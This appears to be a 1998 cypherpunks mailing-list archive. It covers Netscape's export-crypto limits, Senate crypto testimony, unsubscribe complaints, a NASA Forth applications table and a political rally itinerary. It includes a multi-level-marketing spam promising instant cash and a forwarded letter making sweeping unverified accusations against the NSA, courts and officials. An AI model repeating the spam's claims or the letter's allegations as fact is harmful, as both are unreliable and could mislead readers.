
Pauline Hanson will be speaking on the failures of successive governments,
the dangers facing Australians and the urgent need for our country to change
direction and once again prioritise the needs of our people.

Tickets will be sold at the door at most venues. Enquiries should be
directed to One Nation Manly office - (02) 9976 0283

Her Sydney itinerary:

Today (13th March 1998) 

Speaking on Channel 9s Midday Show.

7.30pm Public meeting at AJC Club in Allison Road, Randwick 

Tomorrow (Saturday 14th March)

12 noon - Hawkesbury Sportsman's Club, Beaumont Ave North Richmond.
(NOTE: This is a luncheon also featuring 2GB Radio personality Brian Wiltshire)

7.30pm - Joan Sutherland Centre, High Str., Penrith

Sunday 15th March 

2pm - Cessnock Town Hall, Darwin Street, Cessnock

7.30pm - Dural Country Club, 662 Old Northern Road, DURAL

Monday 16th March

7.30pm Manly Warringah Leagues Club, Pittwater Road, Brookvale

Tuesday 17th March

7.30pm Wyong Multi-Function centre, Healey Str, Wyong

Show your support. BE THERE!

GWB


Scott Balson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Fri, 13 Mar 1998 09:45:30 -0800 (PST)
To: cypherpunks@toad.com>
Subject: Re: Fortify
In-Reply-To: <199803130603.HAA04734@basement.replay.com>
Message-ID: <3.0.5.32.19980313094123.007c6b40@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:03 AM 3/13/98 +0100, Anonymous wrote:
>Tthe remarkably hackable nature of  Netscape's "weak" crypto has been
marveled
>at here and in the press, but has no one else speculated on how this state of
>affairs came to be?  I, for one, would like to thank the anonymous
cypherpunks
>toiling in the bowels of Netscape.  An amazing feat, achieving world-wide
>distribution of millions of copies of strong crypto, the Feds all
unknowing.  
>Does anyone here _not_ think this was the deliberate act of one or more
>cryptoanarchists?
>

Not to burst your optimism, but wouldn't good software design dictate
maintainable, ie, modifiable code?




------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

Beat your algorithms into swords and your virtual machines into spears:
let the weak say, I am strong. 

Gosling deliver us from the ropes of backcompatability and mass production.









	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Fri, 13 Mar 1998 11:14:36 -0800 (PST)
To: David Honig <honig@otc.net>
Subject: Re: Fortify
In-Reply-To: <3.0.5.32.19980313094123.007c6b40@otc.net>
Message-ID: <Pine.LNX.3.96.980313135638.17854A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 13 Mar 1998, David Honig wrote:
> Not to burst your optimism, but wouldn't good software design dictate
> maintainable, ie, modifiable code?

That depends on how you are using the term 'good.' If the purpose of the
design is to make a programmer's life easy, then you may be right. 

On the other hand, if the software calls for a bit of security, like
ns does, then I would assume otherwise. Programmers who are serious about
making crippleware don't distribute the full executable with a simple
branch instruction (going to the cripple routine) to keep the user at bay:
they know that it is trivial to modify the code. I would assume that 
the programmer's at netscape understand this. If they were serious about
keeping people from using 128 bit crypto, they would have yanked it
completely. 

Now, I don't think that this was done out of benevolence, mind you.
Rather, I think that they are a bit more concerned with producing a
good browser and didn't take the time to design a weak-crypto version:
they took the easy way out.

Netscape wants to make money, and for this I support them. They aren't 
going to pay programmers to make a product like a weak-crypto browser
when it doesn't make them money. They get the minimum job done to bow to
ITAR, and they get to work on some new snazzy features for the next
version.

They make Fortezza-based browsers too, would we call them the servants
of Big Brother? Hell no. They are neither freedom fighters nor henchmen
of a tyrant: they are businessmen.

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"Enlightenment is man's emergence from his self-incurred immaturity.
Immaturity is the inability to use one's own understanding without the
guidance of another. . .Sapere aude! Have the courage to use your own
understanding!" - Immanuel Kant "What is Enlightenment?"

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBNQmEAAKEiLNUxnAfAQEL2QQAhvnV1xLRjXo5YHl+IBwAmBYLzfnPFspP
KXNG5cxltO2ImEK094PxC9FPbEqvmHtid/e+kNzJ4lMPVAh+JZ6ALrcynRkjWK8F
ZkgDZbqaIorT94w2SJppcxMAVYyJ9oAw94uytcXvPTEXDn2IOdTlpw/3gsTaHEPN
ly4Kb1iBhMs=
=tgBR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andrew fabbro <afabbro@umich.edu>
Date: Fri, 13 Mar 1998 11:17:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Fortify
In-Reply-To: <199803130603.HAA04734@basement.replay.com>
Message-ID: <Pine.LNX.3.95.980313140458.34A-100000@brokenarrow.us.itd.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Mar 1998, Anonymous wrote:

> toiling in the bowels of Netscape.  An amazing feat, achieving world-wide 
> distribution of millions of copies of strong crypto, the Feds all unknowing.  

Netscape distributes both a domestic version and an international version:

"Note to customers from countries other than Canada and the United States:
Netscape's recent agreement with the U.S. government allows you to
download Netscape Communicator client software with strong encryption
capabilities that can be accessed only when you connect to particular
Netscape servers approved for export. This capability is now built into
all Netscape Communicator client products and does NOT require you to
fill out an eligibility declaration.

U.S. and Canadian citizens and permanent residents may download versions
with strong encryption that is ALWAYS enabled (regardless of the 128-bit
server connected to) but must still fill out an eligibility declaration
before doing so.

This option allows you to talk to sites that use a strong version of
cryptography to encode sensitive information - such as a credit card
number - that you don't want anyone to be able to capture and read
as it is transmitted over the Internet. All Netscape products include
cryptographic capability. However, if you are a U.S. or Canadian citizen
or a legal permanent resident of the United States, you can choose a
version with the stronger encryption always enabled.

Strong encryption refers to the size of the key used to encrypt the
message. Roughly speaking, messages encrypted with strong (128-bit)
encryption are 309,485,009,821,345,068,724,781,056 times harder to break
than those that use 40-bit encryption. However, some experts estimate that
keys much shorter than 128 bits will be safe for the next two decades.

The strong U.S./Canada-only encryption version is available in French
and English to U.S. and Canadian citizens and to permanent residents of
the United States only.  Because the U.S. government restricts export of
any product using 128-bit encryption, you will be asked to fill out an
Eligibility Declaration stating that you are a U.S. or Canadian citizen or
a legal permanent resident of the United States before you will be allowed
to download the software you've selected. The Eligibility Declaration
will be stored in a database and made available to the U.S. government
upon request."

	-- http://home.netscape.com/download/client_options.html#enhanced




-- 
 Andrew Fabbro   [afabbro@umich.edu]   [andrewf@jesuswept.com]
 http://www-personal.umich.edu/~afabbro/          313.647.2713 
 "We make money the old fashion way. We print it." - DigiCrime






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cindy Cohn <Cindy@mcglashan.com>
Date: Fri, 13 Mar 1998 14:52:20 -0800 (PST)
To: bernstein-announce@toad.com
Subject: Correction re Senate testimony
Message-ID: <199803132231.OAA26445@gw.quake.net>
MIME-Version: 1.0
Content-Type: text/plain


My earlier post was slightly overstated.  Phil Karn has testified before
Congress numerous times about his legal challenge and has consistently
pushed these issues in the legislature.  

My testimony will be the first time any of the attorneys involved have been
asked to discuss the constitutional problems with the cryptography
restrinctions.

My apologies to Phil.

Cindy



******************************
Cindy A. Cohn, Cindy@McGlashan.com
McGlashan & Sarrail, P.C.
177 Bovet Road, 6th Floor
San Mateo, CA 94402
(650) 341-2585 (tel)
(650) 341-1395 (fax)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Fri, 13 Mar 1998 14:42:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: get me off/ME TOO!
Message-ID: <1e0ef5b7.3509b602@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-12 23:17:51 EST, joc@pdx.oneworld.com writes:

<< Hello- ANYONE!!!
 Please, my young son subscribed me to this -whatever you are- and I 
 cannot get off- I do not want any e-mail from you.  Can I please get 
 instructions as to how to stop this? >>

Me too.  Take me off of your stinkin' list.

Stan and the Sequencers




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Fri, 13 Mar 1998 15:26:57 -0800 (PST)
To: bernstein-announce@toad.com
Subject: Re: Correction re Senate testimony
Message-ID: <4e16d544.3509bbac@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Take me off of this list.

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 13 Mar 1998 18:16:09 -0800 (PST)
To: cyberia-l@listserv.aol.com
Subject: taocp v3 p32
Message-ID: <3509E567.2364@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Subject: 
        Swiss radio international tape
  Date: 
        Fri, 13 Mar 1998 17:45:06 -0700
  From: 
        bill payne <billp@nmol.com>
    To: 
        taocp@cs.stanford.edu
Knuth

Hope you got a copy of the tape.

I wonder or not whether you knew that NSA ACTIVELY tried
to suppress knowledge and research on shift register
sequences.  And Forth too.

Looks like possibly a BAD SCENE ahead.

Best, allahu akbar, etc.

bill

Title: 
Don Knuth's Home Page








:



 Donald E. Knuth
(<img src="http://www-cs-staff.stanford.edu/~knuth/gaoduhnah.gif" align="absmiddle"
   border=0 alt="U+9AD8+5FB7+7EB3">),

Professor Emeritus of 
The Art of Computer Programming
at
Stanford University,
welcomes you to his home page.





<img src="http://www-cs-staff.stanford.edu/~knuth/jofa.gif" alt="*" align="top" border=0
 hspace=10>Frequently Asked Questions



<img src="http://www-cs-staff.stanford.edu/~knuth/jofa.gif" alt="*" align="top" border=0
 hspace=10>Recent News






<img src="http://www-cs-staff.stanford.edu/~knuth/jofa.gif" alt="*" align="top" border=0
 hspace=10>Computer Musings
 -->



<img src="http://www-cs-staff.stanford.edu/~knuth/jofa.gif" alt="*" align="top" border=0
 hspace=10>Known Errors in My Books



<img src="http://www-cs-staff.stanford.edu/~knuth/jofa.gif" alt="*" align="top" border=0
 hspace=10>Important Message to all Users of TeX



<img src="http://www-cs-staff.stanford.edu/~knuth/jofa.gif" alt="*" align="top" border=0
 hspace=10>Help Wanted



<img src="http://www-cs-staff.stanford.edu/~knuth/jofa.gif" alt="*" align="top" border=0
 hspace=10>Preprints of Recent Papers



<img src="http://www-cs-staff.stanford.edu/~knuth/jofa.gif" alt="*" align="top" border=0
 hspace=10>Curriculum Vit



<img src="http://www-cs-staff.stanford.edu/~knuth/jofa.gif" alt="*" align="top" border=0
 hspace=10>Pipe Organ



<img src="http://www-cs-staff.stanford.edu/~knuth/jofa.gif" alt="*" align="top" border=0
 hspace=10>Downloadable Graphics



<img src="http://www-cs-staff.stanford.edu/~knuth/jofa.gif" alt="*" align="top" border=0
 hspace=10>Downloadable Programs



<img src="http://www-cs-staff.stanford.edu/~knuth/jofa.gif" alt="*" align="top" border=0
 hspace=10>Expecting a check from me?




(don't click here)




<img src="http://www-cs.stanford.edu/gifs/logo.csd.gif" align="absmiddle"
 border=0 hspace=10>Stanford Computer Science Home Page









Thursday 3/12/98 7:34 AM

Certified - Return Receipt Requested

Cynthia McKinney

124 Cannon Building
Washington, DC 20515
Office: (202)225-1605
Fax: (202)226-0691
http://www.house.gov/mckinney/

Dear Representative McKinney:



PURPOSE of this letter is to ask your help for us to obtain copes of 
docket sheets from the Tenth Circuit Court of Appeals for cases 
No. 94-2205, Payne v Sandia and 95-2204, Morales v Sandia.

All of our legal efforts to obtain these documents, which any citizen
has a right to, have failed.

REASON you are selected to help is that you appear to be knowledgeable
about operation of the current US federal government and willing to speak 
out in an attempt to solve problems.

You appeared Friday February 27, 1998 on  PBS, The NewsHour with Jim 
Lehrer, along with senators Campbell, Hollings, Lott, Shelby Robb and 
representatives Dana Rohrabacher and Harold Rogers.

These senators and congressmen appeared not to support your views because
they are either mis- or not well-informed about US involvement in support 
of Saddam Hussein.

Stories supporting your view appear on Internet at

  NSA, Crypto AG, and the Iraq-Iran Conflict by J. Orlin Grabbe
  http://www.aci.net/kalliste/speccoll.htm

and

 Crypto AG: The NSA's Trojan Whore? by Wayne Madsen
 http://caq.com/CAQ/caq63/caq63madsen.html

Madsen begins

   It may be the greatest intelligence scam of the century:
   For decades, the US has routinely intercepted and
   deciphered top secret encrypted messages of 120
   countries

But NSA , and as a result the US federal government, apparnetly 
got caught involved in complicity of deaths of about 500,000 Iranians.

This is the subject of a Federal lawsuit seen on Internet at

   http://jya.com/whpfiles.htm
  
US federal government help of Iraq during the Iraq-Iran war may 
possibly backfire on innocent US citizens.

The Wall Street Journal, March 10, 1998, pp. B1, B9. reports

   A Peek Inside a Giant Germ Warehouse 

   By Rochelle Sharpe

   Rockville, Md. -- They keep anthrax bacteria in the
   basement of a faded red-brick building here.

   It isn't far from the yellow-fever virus, the botulism
   bacteria and some of the hundreds of organisms that cause
   the common cold. In fact, there are samples of 85,000
   different fungi, viruses, cells, genes and bacteria here at
   the American Type Culture Collection, by far the largest of
   the 450 repositories of biological materials scattered
   around the globe. ...

   The ATCC legally shipped 10 vials of anthrax, botulism and
   other deadly substances to Iraqi scientists in the 1980s --
   when the U.S. and Iraq were on much friendlier terms -- all
   with the Commerce Department's approval. ...

   http://www.jya.com/btn031198.txt

The US federal government apparently intended these bioweapons to 
be used against the people of Iran.

You demonstrated on PBS TV a quality identified by Francis Bacon

         The contemplation of things as they are,
                without error or confusion,
            without substitution or imposture,
   is in itself a nobler thing than a whole harvest of invention.

by your statement about Saddam Hussein on PBS

                ...our man and our creation...

Perhaps after reading the above materials and

   The Problem of Paradigm Shifts - Terrorism and the 
   Threat From Weapons of Mass Destruction in the Middle East
   Working Draft Anthony H. Cordesman, Senior Fellow and 
   Co-Director Middle East Studies Program October 22, 1996

  http://www.csis.org/mideast/terror.html

senators Campbell, Hollings, Lott, Shelby, Robb and representatives 
Dana Rohrabacher and Harold Rogers MAY NOW understand why you are 
correct and they are mis- or not well-informed about US involvement 
with Saddam Hussein.

PROBLEM we face with the US court system is that court clerks and judges
have committed Title 18 felony violation of law IN WRITING in an attempt
to deny us monetary compensation due us for the cases WE WON at the 
Tenth Circuit on Appeal.  

But judges awarded victories to the US federal government in violation 
of Federal Rules of Appellate Procedure.

Cases  No. 94-2205, Payne v Sandia and 95-2204, Morales v Sandia 
were both won pro se on appeal.

We have filed a writ of mandamus with supreme court judge 
Scalia in an  attempt to get the docket sheets for the two above 
cases.

But Scalia will not answer our certified letters.

Senator McCain wrote Payne on December 23, 1997

  I wanted to take this opportunity of than you for you letter of 
  December 3, 1997. 

  Your situation is in the jurisdiction of Senator Pete Dominici.  
  Therefore, I have  forwarded you letter to his attention.

  William, I hope you situation can be resolved favorably.

Lawyers and politicians Dominici and Bingaman are part of a 
problem not a solution.

Dominici and Bingaman have the following agenda

  University of New Mexico Bureau for Business and Economic
  Research reported on October 14, 1997: 

  A  The Gross State Product of New Mexico is $37.8 billion.

  B  The US Federal government sends $11.3 billion to New Mexico
      each year.

  C  For each $1 New Mexico sends to Washington, New Mexico gets 
      $2 back.

THEREFORE, Representative McKinney, we ask your help to get copies
of the docket sheets.

Citizens of the US are becoming more upset with the behavior of 
bureaucrats, the courts [lawyers], and the US federal government. 

Some Americans have no other way to express their dissatisfaction
with US federal government mismanagement of our country except
by violence.

Frederick Douglass either wrote or said on  August 4, 1847

          Those who profess to favor freedom,
            and yet depreciate agitation
   are men who want crops without plowing up the ground.
      They want rain without thunder and lightening.
         Power concedes nothing without a demand.
            It never did, and it never will.
       Find out just what people will submit to
        and you have found out the exact amount
  of injustice and wrong which will be imposed upon them.
      These will continue until they are resisted
        with either words or blows, or with both.
          The limits of tyrants are prescribed
       by the endurance of those whom they oppress.

We chose to use the words and law to hold government 
employees accountable.

Please encourage Scalia to do his job. 

Help get us copies of the docket sheets.  

And even perhaps help investigate further and settle this 
American tragedy.


Sincerely,



Arthur R. Morales                William H. Payne
1023 Los  Arboles NW             13015 Calle de Sandias NE
Albuquerque, NM 87107            Albuquerque, NM 87111

Enclosures
1  NSA, Crypto AG, and the Iraq-Iran Conflict by J. Orlin Grabbe
2  Crypto AG: The NSA's Trojan Whore? by Wayne Madsen
3  Swiss Radio International Audio tape, 15 May, 18 July 1994

Distribution
Ben Nighthorse Campbell
  administrator@campbell.senate.gov 
Ernest Hollings
  senator@hollings.senate.gov
Trent Lott
  senatorlott@lott.senate.gov
Richard Shelby
  senator@shelby.senate.gov 
Charles Robb
  Senator_Robb@robb.senate.gov
Jim Lehrer
  newshour@pbs.org


Title: Space Related Applications of Forth









Space-Related Applications of Forth


Compiled by James Rash NASA Goddard Space Flight
Center Greenbelt, Maryland 


Introduction. 

The following table presents space-related applications
of Forth microprocessors and the Forth programming language, including


spacecraft flight system controllers 

on-board payload experiment controllers 

ground support systems (e.g., communications controllers
and data processing systems) 

hardware or software used to build or test either flight
or ground systems. 

Developers are requested to supply table updates and
corrections, as well as information regarding relevant projects not
already included, as appropriate. Please send information, comments, and
suggestions to the author of this web page. Authorization for release of
the information is the responsibility of the contributor. 

Please notify the author concerning any non functional
URLs, links, or contact information in the table. 

Further information on Forth, including the ANSI standard
(ANS Forth): 

Forth Interest
Group Maryland Forth Interest Group: http://www.bcpl.lib.md.us/~nbuck/fig.html -->

Taygeta




Notice: Nothing appearing in these pages is to be
construed as an endorsement by NASA. The information may be changed or
withdrawn at any time without notice. The author has obtained the information
from sources believed to be reliable, and has attempted to ensure accuracy,
but makes no guarantees or representations of any kind. Copying, using,
and distributing the table is authorized, provided it is kept intact, properly
attributed, and accompanied by this Notice. 






DEVELOPER

MISSION

DESCRIPTION

FURTHER INFORMATION
(note: remove blanks from email addresses given below)



Ball Aerospace (click on "Aerospace"
link)

Advanced Composition Explorer (ACE)

Star Scanner instrument & control software, using Harris RTX 2000
Forth microprocessor


 



Ball Aerospace 

Advanced X-Ray Astronomical Facility (AXAF)

Software to control the Science Instrument selection and focus mechanisms,
using Harris RTX 2010 Forth microprocessor


 



Ball Aerospace 

Advanced X-Ray Astronomical Facility (AXAF)

Software to operate precision CCD Aspect Camera, using Harris RTX 2010
Forth microprocessor


 



Ball Aerospace 

Earth Observing System (EOS)

Scanning mirror controller for the Thermal Imaging Radiometer (TIR),
using Harris RTX 2010 Forth microprocessor 


 



Ball Aerospace 

Midcourse Sensor Experiment (MSX) - SDIO

Star Tracker instrument & control software, using Harris RTX 2000
Forth microprocessor 


 



Ball Aerospace 

Military aircraft

Star Tracker instrument & control software, using Harris RTX 2000
Forth microprocessor 


 



Ball Aerospace 

Miniature Seeker Technology Integration (MSTI)

Star Tracker instrument & control software, using Harris RTX 2000
Forth microprocessor 


 



Ball Aerospace 

Near Earth Asteroid Rendezvous (NEAR)

Star Tracker instrument & control software, using Harris RTX 2000
Forth microprocessor 


 



Ball Aerospace 

Shuttle

Star Tracker instrument & control software, using Harris RTX 2000
Forth microprocessor 


 



Ball Aerospace 

Submillimeter Wave Astronomy Satellite (SWAS)

Star Tracker instrument & control software, using Harris RTX 2000
Forth microprocessor 


 



Ball Aerospace 

X-ray Timing Explorer (XTE)

Star Tracker instrument & control software, using Harris RTX 2000
Forth microprocessor 


 



California Institute of Technology (Caltech)

Advance Composition Explorer (ACE)

Cosmic Ray Isotope Spectrometer (CRIS) instrument controller hardware
(RTX2010) and software in Forth

Walter Cook at wrc@ thor.srl.caltech.edu



California Institute of Technology (Caltech)

Advance Composition Explorer (ACE)

Solar IsotopeSpectrometer (SIS) instrument controller hardware (RTX2010)
and software in Forth

Walter Cook at wrc@ thor.srl.caltech.edu



Johns Hopkins University Applied Physics
Laboratory (JHU/APL) 

USAF DMSP

Magnetometer instrument control


 



JHU/APL

USAF DMSP

Special Sensor Ultraviolet Spectrographic Imager (SSUSI), 5 missions
over 15 years using Harris RTX 2010 Forth microprocessor 

 



JHU/APL

Advanced Composition Explorer (ACE) satellite

ULEIS (Ultra Low Energy Isotope Spectrometer), using embedded Harris
RTX 2010 Forth microprocessor 


 



JHU/APL

CASSINI
spacecraft

Magnetospheric Imager (MIMI) using Harris RTX 2010 Forth microprocessor



 



JHU/APL

HILAT

Magnetometer instrument control 


 



JHU/APL

Hopkins Ultraviolet Telescope (HUT)

Instrument control, on-line data analysis, telemetry 


 



JHU/APL

MAGSAT

Attitude Control Processor 


 



JHU/APL

"Polar Bear" (Polar Beacon & Auroral Research Satellite)

Magnetometer instrument control 


 



JHU/APL

US Navy LONARS High precision navigation receiver using Loran-C

Real time data processing & sensor control software 


 



JHU/APL

Near Earth Asteroid Rendezvous (NEAR)

Command & Telemetry Processor, 
Multi-Spectral Imaging System, 
Infrared Spectrograph and Magnetometer, 
X-ray/Gamma-ray Spectrometer, and 
Laser Rangefinder, all using the Harris RTX 2010RH Forth microprocessor



 



Los Alamos National Laboratory

Advanced Composition Explorer (ACE) satellite

Solar wind data processing unit, using Harris RTX 2010 Forth microprocessor



 



McDonnell Douglas

Shuttle - Electrophoresis Operations in Space (1986)

Pharmaceutical purification process control software 


Robert Wood at rwood@ mdc.com




McGill University

International Microgravity Laboratory (IML-1)
(Shuttle mission STS-42) 

Space Adaptation Syndrom Experiment management and data acquisition
for four out of seven life science experiments 


Luc Lefebvre at lefebvre@ medcor.mcgill.ca




NASA/GSFC

Compatibility Test Van (CTV)

Dual channel PCM simulator system software 


 



NASA/GSFC

Compatibility Test Van (CTV): Landsat, HST, GRO, COBE, UARS, etc.,
Wallops, Data Evaluation Lab

Programmable Data Formatter III system software 


 



NASA/GSFC

CRAF/CASSINI

MASSACQ Flight Instrument Test/Calibration System 


 



NASA/GSFC

Marine Optical Buoy (MOBY)

Command and data acquisition system written in Forth


Mark Yarbrough at yarbrough@ mlml.calstate.edu




NASA/GSFC

Massively Parallel Processor (MPP)

Image processing software


 



NASA/GSFC

NCC Mission Operations Support Area (MOSA)

ITR (Intelligent Transmitter/Receiver) -- Interface board for MOSA
(formerly Mini-NOCC) Front End


Thomas Sardella at Thomas.E.Sardella.1@ gsfc.nasa.gov




NASA/GSFC

Shuttle Solar Backscatter Ultra Violet (SSBUV)
ozone calibration instrument with 8 successful Shuttle bay flights

Small Payload Accommodation Module (SPAM) interface controller software
written in Forth


Bob Caffrey at Robert.T.Caffrey.1@ gsfc.nasa.gov




NASA/GSFC

Shuttle Solar Backscatter Ultra Violet (SSBUV)

Instrument Interface Electronics Module (IIEM) software written in
Forth


John T. (Tom) Riley at john.t.riley.1@ gsfc.nasa.gov




NASA/GSFC

Shuttle Ozone Limb Sounder Experiment (SOLSE)

A "Hitchhiker Junior", to fly summer '97 -- instrument controller
written in Forth



(ditto)





NASA/GSFC

Limb Ozone Retrieval Experiment (LORE)

A small independent instrument within SOLSE -- instrument controller
written in Forth



(ditto)





NASA/GSFC

Ultraviolet Imaging Telescope (UIT) on Space Shuttle Astro-2 mission

Dedicated Experiment Processor (DEP) written in Forth


Peter Chen at chen@ uit.gsfc.nasa.gov




NASA/GSFC

Small Spacecraft Technology Initiative (SSTI)
(Lewis Research Center/TRW)

Goddard Electronics Module (GEM) data acquisition processor using Harris
RTX-2010


Jay T. Miller at jay.t.miller.1@ gsfc.nasa.gov




NASA/GSFC

ACE (JHU/APL)

Spacecraft Loads & Acoustic Monitor (SLAM) simultaneous data acquisition
and downlink subsystem using Harris RTX-2010



(ditto)





NASA/GSFC

Wideband Transport Frame Formatter (WTFF)

Virtual channel processor & system controller for the Advanced
Orbiting Systems (AOS) Testbed using Harris RTX 2000 Forth microprocessor



Jose Bentancort at Jose@ tsi-telsys.com




NASA/JSC

Shuttle, IML-1

Krug Life Sciences Microgravity Vestibular Investigations 


 



NASA/JPL

Shuttle Imaging Radar (SIR-B)

Command & control software 


 



NASA

TOPEX

Portion of Ground Support Equipment software 


 



Orbital Sciences Corporation

ORBCOMM Experimental Package OXP-1 on Pegasus

Flight & experiment software 


 



Orbital Sciences Corporation

ORBCOMM Experimental Package OXP-1 on Pegasus

Flight & experiment software 


 



Orbital Sciences Corporation (formerly Fairchild Space & Defense)

USAF Multimission Modular Spacecraft (MMS)

Multiplex Data Bus Monitor/Recorder test equipment using Harris RTX2000
microprocessor and firmware written in Forth


Mark A. Mowen at markmowen@ fsd.com




Orbital Sciences Corporation

ORBCOMM-X

Telemetry, flight control support 


 



Orbital Sciences Corporation

USAF APEX

Data management and power control software 


 



Orbital Sciences Corporation

SeaStar

Sea WiFs data management and power control software 


 



Orbital Sciences Corporation/Hercules

Pegasus

Telemetry & flight control 


 



Radio Amateur Satellite Corp. (AMSAT-DL (Germany))

AMSAT OSCAR 10, OSCAR 13,
OSCAR 21, and (in development) Phase 3-D amateur radio satellites 

Integrated Housekeeping Unit (including navigation, attitude control,
telemetry and telecommand tracking, payload control, power management,
health & safety, and propulsion control) and Ground Support Equipment,
all using the Forth-like language IPS (Interpreter for Process Structures).
OSCAR 21 used the Harris RTX2000 microprocessor. 


 



Swedish Space Corp./JHU/APL

Freja 

Magnetometer experiment control 


Lawrence Zanetti at zanetti@ jhuapl.edu




University of California

Galileo

Magnetic Field Experiment instrument control


 



University of Wisconsin

Wisconsin Ultraviolet Photo-Polarimeter Experiment (WUPPE)


Instrument control 


 



US Navy

SPINSAT

Portion of ground support equipment software 


 



USSR 

Baikonur Cosmodrome 

Telemetry data analysis & retrieval workstations 


 



Vertex Communications Corporation

Satellite earthstation antenna systems

7210 Monopulse Antenna Control System on Motorola 68030 platform

sales@ vcsd.com



Last revised: 4 March 1998








Name

Mail
Code



Responsible management official

Sylvia Sheppard



588




Author 

James Rash at james.rash@ gsfc.nasa.gov



588




<!--
Responsible management official: Sylvia Sheppard/Code 522.0, Email: sylvia.sheppard@gsfc.nasa.gov

Author: James Rash/Code 522.2.  Email: james.rash@gsfc.nasa.gov






Name
Code



Responsible management official
Sylvia Sheppard 
522.0



Author 
James Rash 522.2 



-->
For reference purposes, this page is located at URL: 


http://groucho.gsfc.nasa.gov/forth 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 57290970@worldnet.att.net
Date: Sun, 15 Mar 1998 09:18:18 -0800 (PST)
To: wallacer@apamobordol.com
Subject: Extreme Profits! Simple Business
Message-ID: <199803131739.EML03624@apamobordol.com>
MIME-Version: 1.0
Content-Type: text/plain



* Comapany Pays you $20 a signup! Pay one time $39 to Join!
      Pay Checks Twice a Week! This Is Instant Cash!!!!!

Just get 12 Friends to your Free Self Replicating Web Site!
12 x $20 = $240 How long will it take you? I'm doing 3 per day!
3 members x 7 days x $20 = $420 Week! ALL OVER THE NET!

How would you like to make a weekly Pay Check? "WEEKLY"

Every time I look in the mail box another Ad-Net commission 
check is there, and each time it gets Bigger and Bigger!

You get a FREE self-replicating web-site!

Company projections are 50,000 new distributors by April!  
Already people under me in my downline have received up 
to 20 people in spillover in only 2 weeks!!!

If you have not joined, you need to do so Now!!! This is the 
"Grand-daddy" of all MLM Lead Programs. Over 500,000 
networkers either know or they have heard of this company.

Cost is ONLY $39 ONE-TIME Out-of-Pocket! 

Reply with "money" in the subject for info and to signup.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Fri, 13 Mar 1998 19:20:10 -0800 (PST)
To: cyberia-l@listserv.aol.com
Subject: Re: taocp v3 p32
Message-ID: <dac6d199.3509f6db@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-13 21:49:06 EST, billp@nmol.com writes:

<< Subj:	 taocp v3 p32
 Date:	98-03-13 21:49:06 EST
 From:	billp@nmol.com (bill payne)
 Sender:	owner-cypherpunks@toad.com
 To:	taocp@cs.stanford.edu, lawya@lucs-01.novell.leeds.ac.uk,
merata@pearl.sums.ac.ir, wir@monkey-boy.com, cypherpunks@toad.com,
ukcrypto@maillist.ox.ac.uk, cyberia-l@listserv.aol.com
 CC:	merata@pearl.sums.c.ir, lawya@lucs-01.novell.leeds.ac.uk,
sjmz@hplb.hpl.hp.com, wmadsen@explorerer.csc.com
 
 File:  taocpv3p.mim (29360 bytes)
 DL Time (28800 bps): < 1 minute
 
 This message is a multi-part MIME message and will be saved with the default
filename taocpv3p.mim
 --------------------
 Subject: 
         Swiss radio international tape
   Date: 
         Fri, 13 Mar 1998 17:45:06 -0700
   From: 
         bill payne <billp@nmol.com>
     To: 
         taocp@cs.stanford.edu
 Knuth
 
 Hope you got a copy of the tape.
 
 I wonder or not whether you knew that NSA ACTIVELY tried
 to suppress knowledge and research on shift register
 sequences.  And Forth too.
 
 Looks like possibly a BAD SCENE ahead.
 
 Best, allahu akbar, etc.
 
 bill
 
 
 ----------------------- Headers --------------------------------
 Return-Path: <cypherpunks-errors@toad.com>
 Received: from  relay31.mx.aol.com (relay31.mail.aol.com [172.31.109.31]) by
air16.mail.aol.com (v40.7) with SMTP; Fri, 13 Mar 1998 21:49:06 -0500
 Received: from toad.com (toad.com [140.174.2.1])
 	  by relay31.mx.aol.com (8.8.5/8.8.5/AOL-4.0.0)
 	  with ESMTP id VAA06784;
 	  Fri, 13 Mar 1998 21:48:59 -0500 (EST)
 Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id SAA10873 for
cypherpunks-unedited-outgoing; Fri, 13 Mar 1998 18:16:09 -0800 (PST)
 Received: from portal.dx.net (portal.dx.net [199.190.65.2]) by toad.com
(8.7.5/8.7.3) with ESMTP id SAA10868 for <cypherpunks@toad.com>; Fri, 13 Mar
1998 18:16:02 -0800 (PST)
 Received: from nmol.com ([206.162.11.2])
 	by portal.dx.net (8.8.7/8.8.7) with SMTP id VAA24071
 	for <cypherpunks@toad.com>; Fri, 13 Mar 1998 21:17:24 -0500 (EST)
 X-ROUTED: Fri, 13 Mar 1998 19:21:06 -0500
 X-TCP-IDENTITY: Billp
 Received: from billp [206.162.11.158] by nmol.com with smtp
 	id BDAJDCFG ; Fri, 13 Mar 1998 19:09:52 -0500
 Message-ID: <3509E567.2364@nmol.com>
